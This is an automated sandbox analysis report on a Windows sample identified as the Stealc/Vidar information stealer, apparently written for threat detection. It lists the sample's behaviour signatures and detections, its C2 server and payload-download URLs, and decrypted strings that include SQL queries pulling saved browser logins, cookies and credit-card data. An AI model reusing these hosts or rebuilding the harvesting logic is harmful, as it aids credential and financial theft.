Windows Analysis Report
YEnIrzZUUw.exe

Overview

General Information

Sample name: YEnIrzZUUw.exe
renamed because original name is a hash value
Original sample name: 814d30fd5617213cc9765f05bf823181.exe
Analysis ID: 1432015
MD5: 814d30fd5617213cc9765f05bf823181
SHA1: 7556260b8e59cea8f9048cf793f7c52ce75fff85
SHA256: 6b260c2a031fee21a1796091021415225b006baa888bfa2a37c3f79ca86ca9c8
Tags: 32exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: YEnIrzZUUw.exe Avira: detected
Source: http://185.172.128.203/tiktok.exe Avira URL Cloud: Label: malware
Source: 00000000.00000003.1690988607.0000000005B70000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.111/f993692117a3fda2.php"}
Source: YEnIrzZUUw.exe.7428.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.172.128.111/f993692117a3fda2.php"}
Source: http://185.172.128.203/tiktok.exe00 Virustotal: Detection: 15% Perma Link
Source: http://185.172.128.111 Virustotal: Detection: 10% Perma Link
Source: http://185.172.128.203/tiktok.exe Virustotal: Detection: 19% Perma Link
Source: http://185.172.128.203/tiktok.exet-Disposition: Virustotal: Detection: 15% Perma Link
Source: http://185.172.128.111/f993692117a3fda2.php5 Virustotal: Detection: 5% Perma Link
Source: 185.172.128.111/f993692117a3fda2.php Virustotal: Detection: 15% Perma Link
Source: http://185.172.128.111/f993692117a3fda2.php Virustotal: Detection: 15% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe Virustotal: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Virustotal: Detection: 50% Perma Link
Source: YEnIrzZUUw.exe ReversingLabs: Detection: 55%
Source: YEnIrzZUUw.exe Virustotal: Detection: 59% Perma Link
Source: YEnIrzZUUw.exe Joe Sandbox ML: detected
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: lstrcatA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: OpenEventA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CreateEventA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CloseHandle
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Sleep
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: VirtualFree
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: lstrlenA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ExitProcess
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: user32.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CreateDCA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sscanf
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: HAL9TH
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: JohnDoe
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: DISPLAY
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: http://185.172.128.111
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: /f993692117a3fda2.php
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: /8e6d9db21fb63946/
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: default10
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GlobalLock
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: HeapFree
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetFileSize
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GlobalSize
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Process32Next
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Process32First
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: LocalFree
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: FindClose
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ReadFile
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: WriteFile
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CreateFileA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CopyFileA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetLastError
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GlobalFree
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: OpenProcess
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ole32.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: wininet.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: shell32.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: psapi.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SelectObject
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: BitBlt
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: DeleteObject
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GdipFree
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CoInitialize
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetDC
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CloseWindow
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: wsprintfA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CharToOemW
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: wsprintfW
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: StrStrA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: StrCmpCW
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RmStartSession
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RmRegisterResources
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RmGetList
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: RmEndSession
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_open
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_step
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_column_text
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_finalize
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_close
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3_column_blob
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: encrypted_key
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: PATH
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: NSS_Init
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: NSS_Shutdown
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: PK11_FreeSlot
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: PK11_Authenticate
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: C:\ProgramData\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: browser:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: profile:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: url:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: login:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: password:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Opera
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: OperaGX
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Network
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: cookies
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: .txt
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: TRUE
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: FALSE
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: autofill
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: history
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: name:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: month:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: year:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: card:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Cookies
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Login Data
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Web Data
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: History
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: logins.json
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: formSubmitURL
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: usernameField
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: encryptedUsername
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: encryptedPassword
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: guid
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: cookies.sqlite
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: formhistory.sqlite
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: places.sqlite
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: plugins
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Local Extension Settings
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Sync Extension Settings
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: IndexedDB
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Opera Stable
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Opera GX Stable
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: CURRENT
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: chrome-extension_
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Local State
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: profiles.ini
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: chrome
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: opera
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: firefox
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: wallets
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ProductName
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ProcessorNameString
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: DisplayName
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: DisplayVersion
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Network Info:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - IP: IP?
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Country: ISO?
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: System Summary:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - HWID:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - OS:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Architecture:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - UserName:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Computer Name:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Local Time:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - UTC:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Language:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Keyboards:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Laptop:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Running Path:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - CPU:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Threads:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Cores:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - RAM:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - Display Resolution:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: - GPU:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: User Agents:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Installed Apps:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: All Users:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Current User:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Process List:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: system_info.txt
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: nss3.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \Temp\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: .exe
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: runas
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: open
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: /c start
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %DESKTOP%
